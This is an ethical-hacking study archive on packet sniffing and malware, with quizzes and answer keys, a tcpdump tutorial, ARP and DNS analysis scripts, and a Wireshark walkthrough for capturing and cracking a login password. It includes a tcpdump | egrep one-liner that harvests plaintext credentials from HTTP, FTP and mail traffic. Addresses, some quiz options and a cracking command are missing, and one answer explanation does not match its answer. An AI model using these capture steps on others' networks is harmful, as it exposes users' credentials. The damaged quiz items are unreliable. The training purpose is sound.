Category Archives: (F) CEH (PART B)

MODULE 8.4 Review Questions For SNIFFERS

1. On a switch, each switchport represents a ____________.


B. Broadcast domain

C. Host

D. Collision domain

2. Wireless access points function as a ____________.

A. Hub

B. Bridge

C. Router

D. Repeater

3. What mode must be configured to allow an NIC to capture all traffic on the wire?

A. Extended mode

B. 10/100

C. Monitor mode

D. Promiscuous mode

4. Which of the following prevents ARP poisoning?

A. ARP Ghost

B. IP DHCP Snooping

C. IP Snoop

D. DNSverf

5. Jennifer is a system administrator who is researching a technology that will secure network traffic from potential sniffing by unauthorized machines. Jennifer is not concerned with the future impact on legitimate troubleshooting. What technology can Jennifer implement?





6. MAC spoofing applies a legitimate MAC address to an unauthenticated host, which allows the attacker to pose as a valid user. Based on your understanding of ARP, what would indicate a bogus client?

A. The MAC address doesn’t map to a manufacturer.

B. The MAC address is two digits too long.

C. A reverse ARP request maps to two hosts.

D. The host is receiving its own traffic.

7. Bob is attempting to sniff a wired network in his first pen test contract. He sees only traffic from the segment he is connected to. What can Bob do to gather all switch traffic?

A. MAC flooding

B. MAC spoofing

C. IP spoofing

D. DOS attack

8. What technique funnels all traffic back to a single client, allowing sniffing from all connected hosts?

A. ARP redirection

B. ARP poisoning

C. ARP flooding

D. ARP partitioning

9. Which Wireshark filter displays only traffic from

A. ip.addr =!

B. ip.addr ne

C. ip.addr ==

D. ip.addr –

10. What common tool can be used for launching an ARP poisoning attack?

A. Cain & Abel

B. Nmap

C. Scooter

D. Tcpdump

11. Which command launches a CLI version of Wireshark?

A. Wireshk

B. dumpcap

C. tshark

D. editcap

12. Jennifer is using tcpdump to capture traffic on her network. She would like to save the capture for later review. What command can Jennifer use?

A. tcpdump -r capture.log

B. tcpdump -l capture.log

C. tcpdump -t capture.log

D. tcpdump -w capture.log

13. What is the generic syntax of a Wireshark filter?

A. protocol.field operator value

B. field.protocol operator value

C. operator.protocol value field

D. protocol.operator value field

14. Tiffany is analyzing a capture from a client’s network. She is particularly interested in NetBIOS traffic. What port does Tiffany filter for?

A. 123

B. 139

C. 161

D. 110


1. D. Each switchport represents a collision domain, thereby limiting sniffing to only the clients residing on that port.

2. A. All wireless access points are essentially hubs in that they do not segregate traffic the way a traditional wired switch does.

3. D. An NIC must be configured to operate in promiscuous mode to capture all traffic on the network. More specifically, it allows the interface to capture both traffic that is intended for the host and traffic that is intended for other clients.

4. B. IP DHCP Snooping can be used on Cisco devices to prevent ARP poisoning by validating IP-to-MAC mappings based on a saved database.

5. C. Jennifer can implement a form of encryption for the traffic that she wants to protect from sniffing. Secure Shell traffic would not be readable if captured by a sniffer; however, any legitimate network troubleshooting efforts would also prove more challenging because of packet encryption.

6. C. MAC spoofing results in duplicate MAC addresses on a network unless the compromised client has been bumped from its connection. Two IP addresses mapping to one MAC indicates a bogus client.

7. A. Bob can launch a MAC flooding attack against the switch, thereby converting the switch into a large hub. If successful, this will allow Bob to sniff all traffic passing through the switch.

8. B. ARP poisoning alters ARP table mappings to align all traffic to the attacker’s interface before traveling to the proper destination. This allows the attacker to capture all traffic on the network and provides a jumping-off point for future attacks.

9. C. The Wireshark operator == means equal to. In this scenario, using the == operator filters down to as the specific host to be displayed.

10. A. Cain & Abel is a well-known suite of tools used for various pen-testing functions such as sniffing, password cracking, and ARP poisoning.

11. C. The command for the CLI version of Wireshark is tshark.

12. D. Tcpdump uses the option -w to write a capture to a log file for later review. The option -r is used to read the capture file, or the capture can be opened in a GUI-based sniffer such as Wireshark.

13. A. Wireshark filters use the basic syntax of putting the protocol first followed by the field of interest, the operator to be used, and finally the value to look for (tcp.port == 23).

14. B. Tiffany looks for NetBIOS traffic on port 139. She can use the filter string tcp.port eq 139.

MODULE 8.3 Sniffing With TCPDUMP

Tcpdump is a command-line network analyzer tool, or more technically a packet sniffer. It can be thought of as the command-line version of Wireshark (only to a certain extent, since Wireshark is much more powerful and capable).

As a command-line tool tcpdump is quite powerful for network analysis, since filter expressions can be passed in and tcpdump will pick up only the matching packets and dump them.

In this tutorial we are going to learn to use tcpdump and how it can be used for network analysis. On Ubuntu, for example, it can be installed by typing the following in a terminal:

$ sudo apt-get install tcpdump

Tcpdump depends on the libpcap library for sniffing packets. It is documented here.

For Windows use the alternative called WinDump. It is compatible with tcpdump (in terms of usage and options). Download from

Basic sniffing

Let's start using tcpdump. The first simple command to use is tcpdump -n:

$ sudo tcpdump -n
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
16:34:57.266865 IP > ICMP echo reply, id 19941, seq 1176, length 64
16:34:57.267226 IP > 23380+ PTR? (43)
16:34:57.274549 IP > 23380 1/4/2 PTR (195)
16:34:57.297874 IP > UDP, length 105

Why sudo? Because tcpdump needs root privileges to be able to capture packets on network interfaces. On Ubuntu, prepending sudo to any command makes it run with superuser/root privileges. The -n parameter is given to stop tcpdump from resolving IP addresses to hostnames, which takes time and is not required right now.

Let's take a line from the above output to analyse.

16:34:57.267226 IP > 23380+ PTR? (43)

The first thing, “16:34:57.267226”, is the timestamp with microsecond precision. Next is the protocol of the packet, called IP (it stands for Internet Protocol, and it is under this protocol that most internet communication goes on). Next is the source IP address joined with the source port. Following that is the destination address and port, and then some information about the packet.

Now let's increase the display resolution of this packet, or get more details about it. The verbose switch comes in handy. Here is a quick example:

$ sudo tcpdump -v -n
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
16:43:13.058660 IP (tos 0x20, ttl 54, id 50249, offset 0, flags [DF], proto TCP (6), length 40) > Flags [.], cksum 0x6d32 (correct), ack 1617156745, win 9648, length 0
16:43:13.214621 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto ICMP (1), length 84) > ICMP echo request, id 19941, seq 1659, length 64
16:43:13.355334 IP (tos 0x20, ttl 54, id 48656, offset 0, flags [none], proto ICMP (1), length 84) > ICMP echo reply, id 19941, seq 1659, length 64
16:43:13.355719 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 71) > 28650+ PTR? (43)
16:43:13.362941 IP (tos 0x0, ttl 251, id 63454, offset 0, flags [DF], proto UDP (17), length 223) > 28650 1/4/2 PTR (195)
16:43:13.880338 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has tell, length 28
16:43:14.215904 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto ICMP (1), length 84) > ICMP echo request, id 19941, seq 1660, length 64

Now with the verbose switch, lots of additional details about the packet are displayed as well, including the TTL, id, TCP flags, packet length, etc.

Getting the ethernet header (link layer headers)

In the above examples the details of the Ethernet header are not printed. Use the -e option to print the Ethernet header details as well.

$ sudo tcpdump -vv -n -e
[sudo] password for enlightened: 
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
17:57:27.218531 00:25:5e:1a:3d:f1 > 00:1c:c0:f8:79:ee, ethertype IPv4 (0x0800), length 98: (tos 0x20, ttl 54, id 53046, offset 0, flags [none], proto ICMP (1), length 84) > ICMP echo reply, id 19941, seq 6015, length 64
17:57:27.218823 00:1c:c0:f8:79:ee > 00:25:5e:1a:3d:f1, ethertype IPv4 (0x0800), length 85: (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 71) > [bad udp cksum 0x9cee -> 0xe5f6!] 23855+ PTR? (43)
17:57:27.226352 00:25:5e:1a:3d:f1 > 00:1c:c0:f8:79:ee, ethertype IPv4 (0x0800), length 269: (tos 0x0, ttl 251, id 10513, offset 0, flags [DF], proto UDP (17), length 255) > [udp sum ok] 23855 q: PTR? 1/4/4 PTR ns: NS NS4.GOOGLE.COM., NS NS2.GOOGLE.COM., NS NS1.GOOGLE.COM., NS NS3.GOOGLE.COM. ar: NS1.GOOGLE.COM. A, NS2.GOOGLE.COM. A, NS3.GOOGLE.COM. A, NS4.GOOGLE.COM. A (227)

Now the first thing after the timestamp is the source and destination MAC address.
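With -e the frame's source MAC sits next to whatever the ARP body claims, which is exactly what the review answers above rely on (answer 4: validate IP-to-MAC mappings against a saved database; answer 6: one MAC claiming two IPs). The Python below is an added example, not part of tcpdump or this tutorial; it parses tcpdump -e -n ARP lines and reports those indicators, and the sample lines, MAC addresses and trusted binding table are all constructed (RFC 5737 addresses).

```python
"""Spoofing indicators in tcpdump -e -n ARP output.

Added example for this tutorial; not part of tcpdump. It checks three things
the review answers describe: an IP-to-MAC mapping that disagrees with a
trusted binding table (the DHCP snooping principle), one MAC claiming several
IPs, and a reply whose is-at address differs from the frame's source MAC.
Sample lines and the trusted table are constructed (RFC 5737 addresses).
"""
import re
from collections import Counter, defaultdict

MAC = r"(?:[0-9a-f]{2}:){5}[0-9a-f]{2}"
IP = r"\d{1,3}(?:\.\d{1,3}){3}"

# With -e the line opens with the Ethernet header "<src mac> > <dst mac>",
# which lets the frame sender be compared with what the ARP body claims.
ARP_RE = re.compile(
    rf"^(?P<ts>\S+) (?P<eth_src>{MAC}) > (?P<eth_dst>{MAC}), "
    rf"ethertype ARP \(0x0806\), length \d+: "
    rf"(?:Request who-has {IP} tell (?P<req_sender>{IP})"
    rf"|Reply (?P<rep_ip>{IP}) is-at (?P<rep_mac>{MAC})), length \d+$"
)

# Constructed trusted bindings, standing in for a DHCP snooping database.
TRUSTED_BINDINGS = {
    "192.0.2.1": "00:25:5e:1a:3d:f1",   # gateway
    "192.0.2.10": "00:1c:c0:f8:79:ee",  # workstation
}

# Constructed capture lines in tcpdump -e -n format.
SAMPLE_LINES = [
    "17:58:01.100000 00:25:5e:1a:3d:f1 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), "
    "length 42: Request who-has 192.0.2.10 tell 192.0.2.1, length 28",
    "17:58:01.100400 00:1c:c0:f8:79:ee > 00:25:5e:1a:3d:f1, ethertype ARP (0x0806), "
    "length 42: Reply 192.0.2.10 is-at 00:1c:c0:f8:79:ee, length 28",
    # a third station answers for both the gateway and the workstation
    "17:58:03.000000 0a:0b:0c:0d:0e:0f > 00:1c:c0:f8:79:ee, ethertype ARP (0x0806), "
    "length 42: Reply 192.0.2.1 is-at 0a:0b:0c:0d:0e:0f, length 28",
    "17:58:03.000300 0a:0b:0c:0d:0e:0f > 00:25:5e:1a:3d:f1, ethertype ARP (0x0806), "
    "length 42: Reply 192.0.2.10 is-at 0a:0b:0c:0d:0e:0f, length 28",
    # frame source and ARP body disagree
    "17:58:04.000000 00:0c:29:aa:bb:cc > 00:1c:c0:f8:79:ee, ethertype ARP (0x0806), "
    "length 42: Reply 192.0.2.1 is-at 00:25:5e:1a:3d:f1, length 28",
    # an IPv4 frame, which the ARP parser ignores
    "17:58:04.500000 00:1c:c0:f8:79:ee > 00:25:5e:1a:3d:f1, ethertype IPv4 (0x0800), "
    "length 98: 192.0.2.10 > 198.51.100.5: ICMP echo request, id 1, seq 1, length 64",
]


def parse_arp(line):
    """Return (ts, sender_ip, claimed_mac, eth_src, op) for an ARP line, else None."""
    m = ARP_RE.match(line)
    if not m:
        return None
    g = m.groupdict()
    if g["req_sender"]:
        # A request advertises the sender's IP; its MAC is only in the frame header.
        return (g["ts"], g["req_sender"], g["eth_src"], g["eth_src"], "request")
    return (g["ts"], g["rep_ip"], g["rep_mac"], g["eth_src"], "reply")


def arp_findings(lines, trusted=TRUSTED_BINDINGS):
    """Return (kind, detail) findings for the ARP lines in `lines`."""
    findings = []
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    for line in lines:
        parsed = parse_arp(line)
        if parsed is None:
            continue
        ts, ip, mac, eth_src, op = parsed
        if op == "reply" and mac != eth_src:
            findings.append(("frame-mismatch",
                             f"{ts} reply says {ip} is-at {mac} but frame came from {eth_src}"))
        expected = trusted.get(ip)
        if expected is not None and expected != mac:
            findings.append(("binding-mismatch",
                             f"{ts} {ip} claimed by {mac}, trusted binding is {expected}"))
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
    for ip, macs in sorted(ip_to_macs.items()):
        if len(macs) > 1:
            findings.append(("ip-multi-mac", f"{ip} answered by {', '.join(sorted(macs))}"))
    for mac, ips in sorted(mac_to_ips.items()):
        if len(ips) > 1:
            findings.append(("mac-multi-ip", f"{mac} claims {', '.join(sorted(ips))}"))
    return findings


def finding_counts(lines, trusted=TRUSTED_BINDINGS):
    """Count findings by kind; handy for a quick assertion or a dashboard."""
    return Counter(kind for kind, _ in arp_findings(lines, trusted))


if __name__ == "__main__":
    for kind, detail in arp_findings(SAMPLE_LINES):
        print(f"[{kind}] {detail}")
```

Feed it `sudo tcpdump -e -n -l arp` output through a pipe and the same checks apply to live traffic; the trusted table is the part you replace with your own DHCP or inventory data.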

Sniffing a particular interface

In order to sniff a particular network interface we must specify it with the -i switch. First let's get the list of available interfaces using the -D switch.

$ sudo tcpdump -D
2.usbmon1 (USB bus number 1)
3.usbmon2 (USB bus number 2)
4.any (Pseudo-device that captures on all interfaces)

Next we can use the interface number or name with the -i switch to sniff that particular interface.

$ sudo tcpdump -i 1
$ sudo tcpdump -i eth0

Filtering packets using expressions

The next important feature of tcpdump as a network analysis tool is that it allows the user to filter packets and select only those that match a certain rule or criteria. Like before, this too is quite simple and can be learned easily. Let's take a few simple examples.

Selecting protocols

$ sudo tcpdump -n tcp

The above command will show only TCP packets. Similarly, udp or icmp can be specified.

Particular host or port

Expressions can be used to specify source IP, destination IP, and port numbers. The next example picks up all those packets with source address

$ sudo tcpdump -n 'src'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
20:04:04.856379 IP > Flags [.], seq 2781603453:2781604873, ack 338206850, win 41850, length 1420
20:04:05.216372 IP > Flags [P.], seq 3980513010:3980513027, ack 2134949138, win 28400, length 17

The next example picks up DNS request packets, i.e. those packets which originate from the local machine and go to port 53 of some other machine.

$ sudo tcpdump -n 'udp and dst port 53'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
20:06:48.015359 IP > 41001+ A? (46)
20:06:50.842530 IP > 12380+ A? (59)

The above output shows the DNS requests made by the local system to the DNS server on port 53. It's all very intuitive and simple. Note the “and”, which is used to combine multiple conditions. This is where the creativity begins: writing powerful expressions to analyse the network.

To display the FTP packets coming from to

$ sudo tcpdump 'src and dst and port ftp'

Note that the port number 21 has been specified by its name – ftp.

So similarly many different kinds of expressions can be developed to fit the needs of the network analyst and pick up matching packets.
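As an added example (not from tcpdump or this tutorial), the Python below parses the tcpdump -n line format walked through above and applies the 'udp and dst port 53' idea in code, tallying DNS queries per source host so a client resolving far more names than its peers stands out. The sample lines are constructed with RFC 5737 addresses, since the page did not preserve the captured ones.

```python
"""Parse tcpdump -n lines and tally DNS queries per source host.

Added example for this tutorial; not part of tcpdump. The line format is the
one walked through above: "<time> IP <src>.<sport> > <dst>.<dport>: <summary>".
Sample lines are constructed (RFC 5737 addresses).
"""
import re
from collections import Counter, defaultdict
from typing import NamedTuple, Optional

IP = r"\d{1,3}(?:\.\d{1,3}){3}"

# Ports are absent on ICMP lines, so both port groups are optional.
LINE_RE = re.compile(
    rf"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP "
    rf"(?P<src>{IP})(?:\.(?P<sport>\d+))? > "
    rf"(?P<dst>{IP})(?:\.(?P<dport>\d+))?: (?P<info>.*)$"
)
# A query summary as tcpdump prints it: "<id>+ <TYPE>? <name> (<len>)"
DNS_QUERY_RE = re.compile(r"^\d+\+ (?P<qtype>[A-Z]+)\? (?P<name>\S+) \(\d+\)$")

# Constructed tcpdump -n output, including lines the DNS tally must skip.
SAMPLE_LINES = [
    "20:06:48.015359 IP 192.0.2.10.41234 > 192.0.2.1.53: 41001+ A? www.example.com. (46)",
    "20:06:48.015822 IP 192.0.2.10.41234 > 192.0.2.1.53: 41002+ AAAA? www.example.com. (46)",
    "20:06:50.842530 IP 192.0.2.10.55120 > 192.0.2.1.53: 12380+ A? cdn.example.net. (59)",
    "20:06:50.843001 IP 192.0.2.1.53 > 192.0.2.10.55120: 12380 1/0/0 A 203.0.113.7 (75)",
    "20:06:51.000000 IP 192.0.2.10.54321 > 192.0.2.1.53: 23380+ PTR? 7.113.0.203.in-addr.arpa. (43)",
    "20:06:52.120000 IP 192.0.2.22.49152 > 192.0.2.1.53: 30001+ A? login.example.org. (48)",
    "20:06:52.500000 IP 192.0.2.10.50000 > 198.51.100.20.443: Flags [.], seq 1:1421, ack 1, win 41850, length 1420",
    "20:06:53.000000 IP 192.0.2.10 > 198.51.100.5: ICMP echo request, id 19941, seq 1, length 64",
    "tcpdump: verbose output suppressed, use -v or -vv for full protocol decode",
]


class Packet(NamedTuple):
    ts: str
    src: str
    sport: Optional[int]
    dst: str
    dport: Optional[int]
    info: str


def parse_line(line: str) -> Optional[Packet]:
    """Parse one tcpdump -n line; banner lines and unknown formats give None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    g = m.groupdict()
    return Packet(g["ts"], g["src"], int(g["sport"]) if g["sport"] else None,
                  g["dst"], int(g["dport"]) if g["dport"] else None, g["info"])


def dns_query(pkt: Packet):
    """Return (qtype, name) for a query sent to port 53, else None.

    Without -v the line does not say UDP or TCP, so "dst port 53" plus the
    query-summary shape is the closest equivalent of the tutorial's filter.
    """
    if pkt.dport != 53:
        return None
    m = DNS_QUERY_RE.match(pkt.info)
    return (m.group("qtype"), m.group("name")) if m else None


def queries_by_source(lines):
    """Map each source IP to a Counter of the (qtype, name) pairs it asked for."""
    result = defaultdict(Counter)
    for line in lines:
        pkt = parse_line(line)
        if pkt is None:
            continue
        q = dns_query(pkt)
        if q is not None:
            result[pkt.src][q] += 1
    return dict(result)


def busiest_sources(lines, top=3):
    """Rank sources by query count, so one host resolving far more names than
    its peers stands out."""
    per_src = queries_by_source(lines)
    ranked = sorted(((sum(c.values()), src) for src, c in per_src.items()), reverse=True)
    return ranked[:top]


if __name__ == "__main__":
    for count, src in busiest_sources(SAMPLE_LINES):
        print(f"{src}: {count} queries")
        for (qtype, name), n in queries_by_source(SAMPLE_LINES)[src].most_common():
            print(f"    {qtype:5} {name} x{n}")
```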

Search the network traffic using grep

Grep can be used along with tcpdump to search the network traffic. Here is a very simple example:

$ sudo tcpdump -n -A | grep -e 'POST'
[sudo] password for enlightened: 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
E...=.@.@......e@.H..'.P(.o%~...P.9.PN..POST /blog/wp-admin/admin-ajax.php HTTP/1.1
E...c_@.@..=...e@.H..*.PfC<....wP.9.PN..POST /blog/wp-admin/admin-ajax.php HTTP/1.1
E.....@.@......e@.H...."g;.(.-,WP.9.Nj..POST /login/?login_only=1 HTTP/1.1

The above example detects packets with the string “POST” in them; as shown, it picks out HTTP POST requests.
The -A option displays the content of the packet in ASCII text form, which is searchable using grep.

On Windows the grep command is not available, but there is an equivalent called find/findstr. Example usage:

C:\tools>WinDump.exe -A | findstr "GET"
WinDump.exe: listening on \Device\NPF_{6019E682-FD40-4A54-BB75-9C2ACFA56CAA}
.....&....P..W.....P....k..GET /search?hl=en&sclient=psy-ab&q=asda&oq
.....&....P..[{..N.P...%-..GET /csi?v=3&s=web&action=&ei=LrmPUMrLNoHO
.P-%.}....P..$Ch..GET /subscribe?host_int=139535925&ns_map=2

So in the above example we used WinDump and searched the sniffed packets for the string “GET” (which mostly matches HTTP GET requests).

So what is the idea behind searching packets? Well, one use is to sniff passwords.
Here is a quick example to sniff passwords using egrep:

tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20


MODULE 8.2 Sniffing Password with Wireshark


Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions.
This tutorial can be an angel and also a devil at the same time; it depends on you, who use this tutorial, for which purpose. As the writer of this tutorial I just hope that all of you can use it in the right way, because I believe that none of you want your password sniffed by someone out there, so don't do that to others either.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills; we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it's a good idea to try to use this to attempt to hack systems that do not belong to them.

Requirements:

1. Wireshark Network Analyzer (
2. Network card (Wi-Fi card, LAN card, etc.); FYI: for Wi-Fi it should support promiscuous mode

Step 1: Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to

Application > Kali Linux > Top 10 Security Tools > Wireshark

In Wireshark go to Capture > Interface and tick the interface that applies to you. In my case, I am using a Wireless USB card, so I’ve selected wlan0.


Ideally you could just press the Start button here and Wireshark will start capturing traffic. In case you missed this, you can always capture traffic by going back to Capture > Interface > Start.


Step 2: Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing it. I opened a browser and signed in to a website using my username and password. When the authentication process was complete and I was logged in, I went back and stopped the capture in Wireshark.

When you type in your username and password and press the Login button, it generates a POST method (in short, you're sending data to the remote server).

To filter all traffic and locate POST data, type the following in the filter section:

http.request.method == "POST"

See the screenshot below. It shows 1 POST event.


Step 3: Analyze POST data for username and password

Now right-click on that line and select Follow TCP Stream.


This will open a new window that contains something like this:


So in this case,

username: sampleuser
password: e4b7c855be6e3d4307b8d6ba4cd4ab91

But hold on, e4b7c855be6e3d4307b8d6ba4cd4ab91 can't be a real password. It must be a hash value.

Cracking this password is simple: just open a new terminal window and type this:


and it looks like this:

  1. username: sampleuser
  2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91:simplepassword

MODULE 8.1 Sniffing Tools

Sniffing tools are extremely common applications. A few interesting ones are listed here:

Wireshark One of the most widely known and used packet sniffers. Offers a tremendous number of features designed to assist in the dissection and analysis of traffic.

Tcpdump A well-known command-line packet analyzer. Provides the ability to intercept and observe TCP/IP and other packets during transmission over the network. Available at

WinDump A Windows port of the popular Linux packet sniffer tcpdump, which is a command-line tool that is great for displaying header information.

OmniPeek Manufactured by WildPackets, OmniPeek is a commercial product that is the evolution of the product EtherPeek.

Dsniff A suite of tools designed to perform sniffing with different protocols with the intent of intercepting and revealing passwords. Dsniff is designed for Unix and Linux platforms and does not have a complete equivalent on the Windows platform.

EtherApe A Linux/Unix tool designed to graphically display a system’s incoming and outgoing connections.

MSN Sniffer A sniffing utility specifically designed for sniffing traffic generated by the MSN Messenger application.

NetWitness NextGen Includes a hardware-based sniffer, along with other features, designed to monitor and analyze all traffic on a network; a popular tool in use by the FBI and other law enforcement agencies.



MODULE 8.0 SNIFFERS – Understanding Sniffers

Sniffers are utilities that you, as an ethical hacker, can use to capture and scan traffic moving across a network. Sniffers are a broad category that encompasses any utility that has the ability to perform a packet-capturing function.

Regardless of the build, sniffers perform their traffic-capturing function by enabling promiscuous mode on the connected network interface, thereby allowing the capture of all traffic, whether or not that traffic is intended for them.

Once an interface enters promiscuous mode, it doesn’t discriminate between traffic that is destined for its address; it picks up all traffic on the wire, thereby allowing you to capture and investigate every packet.

Sniffing can be active or passive in nature. Typically, passive sniffing is considered to be any type of sniffing where traffic is looked at but not altered in any way. Essentially, passive sniffing means listening only. In active sniffing, not only is traffic monitored, but it may also be altered in some way as determined by the attacking party.

Remember that a sniffer is not just a dumb utility that allows you to view only streaming traffic. A sniffer is a robust set of tools that can give you an extremely in-depth and granular view of what your (or their) network is doing from the inside out. That being said, if you really want to extrapolate all the juicy tidbits and clues of each packet, save the capture and review it when time allows. I prefer to review my 20,000 packets of captured data at my local coffee shop with a hot vanilla latte and a blueberry scone. Make it easy on yourself; your target is not going anywhere soon.

Before we go too much into sniffers, it is important to mention that there are also hardware protocol analyzers. These devices plug into the network at the hardware level and can monitor traffic without manipulating it. Typically these hardware devices are not easily accessible to most ethical hackers due to their enormous cost in many cases (some devices have price tags in the six-figure range).

How successful you are at the sniffing process depends on the relative and inherent insecurity of certain network protocols. Protocols such as the tried and true TCP/IP were never designed with security in mind and therefore do not offer much in this area. Several protocols lend themselves to easy sniffing:

  • Telnet/rlogin Keystrokes, such as those including usernames and passwords, can be easily sniffed.
  • HTTP Designed to send information in the clear without any protection and thus a good target for sniffing.
  • Simple Mail Transfer Protocol (SMTP) Commonly used in the transfer of email, this protocol is efficient, but it does not include any protection against sniffing.
  • Network News Transfer Protocol (NNTP) All communication, including passwords and data, is sent in the clear.
  • Post Office Protocol (POP) Designed to retrieve email from servers, this protocol does not include protection against sniffing because passwords and usernames can be intercepted.
  • File Transfer Protocol (FTP) A protocol designed to send and receive files; all transmissions are sent in the clear.
  • Internet Message Access Protocol (IMAP) Similar to SMTP in function and lack of protection.



1. Which statement(s) defines malware most accurately?

  • A. Malware is a form of virus.
  • B. Trojans are malware.
  • C. Malware covers all malicious software.
  • D. Malware only covers spyware.

2. Which is/are a characteristic of a virus?

  • A. A virus is malware.
  • B. A virus replicates on its own.
  • C. A virus replicates with user interaction.
  • D. A virus is an item that runs silently.

3. A virus does not do which of the following?

  • A. Replicate with user interaction
  • B. Change configuration settings
  • C. Exploit vulnerabilities
  • D. Display pop-ups

4. Which of the following is/are true of a worm?

  • A. A worm is malware.
  • B. A worm replicates on its own.
  • C. A worm replicates with user interaction.
  • D. A worm is an item that runs silently.

5. What are worms typically known for?

  • A. Rapid replication
  • B. Configuration changes
  • C. Identity theft
  • D. DDoS

6. What command is used to listen to open ports with netstat?

  • A. netstat -an
  • B. netstat -ports
  • C. netstat -n
  • D. netstat -s

7. Which utility will tell you in real time which ports are listening or in another state?

  • A. Netstat
  • B. TCPView
  • C. Nmap
  • D. Loki

8. Which of the following is not a Trojan?

  • A. BO2K
  • B. LOKI
  • C. Subseven
  • D. TCPTROJAN

9. What is not a benefit of hardware keyloggers?

  • A. Easy to hide
  • B. Difficult to install
  • C. Difficult to detect
  • D. Difficult to log

10. Which of the following is capable of port redirection?

  • A. Netstat
  • B. TCPView
  • C. Netcat
  • D. Loki

11. A Trojan relies on __________ to be activated.

  • A. Vulnerabilities
  • B. Trickery and deception
  • C. Social engineering
  • D. Port redirection

12. A Trojan can include which of the following?

  • A. RAT
  • B. TCP
  • C. Nmap
  • D. Loki

13. What is a covert channel?

  • A. An obvious method of using a system
  • B. A defined process in a system
  • C. A backdoor
  • D. A Trojan on a system

14. An overt channel is __________.

  • A. An obvious method of using a system
  • B. A defined backdoor process in a system
  • C. A backdoor
  • D. A Trojan on a system

15. A covert channel or backdoor may be detected using all of the following except __________.

  • A. Nmap
  • B. Sniffers
  • C. An SDK
  • D. Netcat

16. A remote access Trojan would be used to do all of the following except __________.

  • A. Steal information
  • B. Remotely control a system
  • C. Sniff traffic
  • D. Attack another system

17. A logic bomb has how many parts, typically?

  • A. One
  • B. Two
  • C. Three
  • D. Four

18. A logic bomb is activated by which of the following?

  • A. Time and date
  • B. Vulnerability
  • C. Actions
  • D. Events

19. A polymorphic virus __________.

  • A. Evades detection through backdoors
  • B. Evades detection through heuristics
  • C. Evades detection through rewriting itself
  • D. Evades detection through luck

20. A sparse infector virus __________.

  • A. Creates backdoors
  • B. Infects data and executables
  • C. Infects files selectively
  • D. Rewrites itself



  1.  B, C. Malware covers all types of malicious software, including viruses, worms, Trojans, spyware, adware, and other similar items.
  2.  A, C. Unlike a worm, a virus requires that a user interact with it or initiate replication in some manner.
  3.  D. Typically a virus does not display pop-ups. That is a characteristic of adware.
  4.  A, B. A worm replicates without user interaction.
  5.  A. Worms are typically known for extremely rapid replication rates once they are released into the wild.
  6.  A. netstat -a or -an lists ports on a system that are listening in Windows.
  7.  B. TCPView lists ports and their statuses in real time.
  8.  D. TCPTROJAN is not a Trojan. All the other utilities on this list are different forms of Trojans.
  9.  B. Hardware keyloggers are not difficult to install on a target system.
  10.  C. Netcat can do port redirection.
  11.  C. A Trojan relies on social engineering to entice the victim to open or activate the payload.
  12.  A. A remote access Trojan (RAT) is a common payload to include in a Trojan.
  13.  C. A covert channel is a backdoor or unintended vulnerability on a system that may or may not be created through the use of a Trojan.
  14.  A. An overt channel is a mechanism on a system or process that is typically put in place by design and intended to be used a specific way.
  15.  C. A software development kit (SDK) is used to develop software but not to detect a covert channel.
  16.  C. Typically, a RAT is not used to sniff traffic, but it may be used to install software to perform this function.
  17.  B. A logic bomb comes in two parts: a trigger and a payload. The payload stays dormant until the trigger wakes it up.
  18.  A, C, D. A logic bomb may be activated by any of these options except the presence of a vulnerability.
  19.  C. A polymorphic virus evades detection through rewriting itself.
  20. C. A sparse infector evades detection by infecting only a handful or selection of files instead of all of them.

MODULE 7.9.5 Overt and Covert Channels

When you are working with Trojans and other malware, you need to be aware of covert and overt channels. As mentioned earlier in the chapter, the difference between the two is that an overt channel is put in place by design and represents the legitimate or intended way for the system or process to be used, whereas a covert channel uses a system or process in a way that it was not intended to be used.

The biggest users of covert channels that we have discussed are Trojans. Trojans are designed to stay hidden while they send information or receive instructions from another source. Using covert channels means the information and communication may be able to slip past detective mechanisms that are not designed or positioned to be aware of or look for such behavior.

Tools to exploit covert channels include the following:

Loki Originally designed to be a proof of concept on how ICMP traffic can be used as a covert channel. This tool is used to pass information inside ICMP echo packets, which can carry a data payload but typically do not. Because the ability to carry data exists but is not used, this can make an ideal covert channel.

ICMP Backdoor Similar to Loki, but instead of using Ping echo packets, it uses Ping replies.

007Shell Uses ICMP packets to send information, but goes the extra step of formatting the packets so they are a normal size.

B0CK Similar to Loki but uses Internet Group Management Protocol (IGMP).

Reverse World Wide Web (WWW) Tunneling Shell Creates covert channels through firewalls and proxies by masquerading as normal web traffic.

AckCmd Provides a command shell on Windows systems.

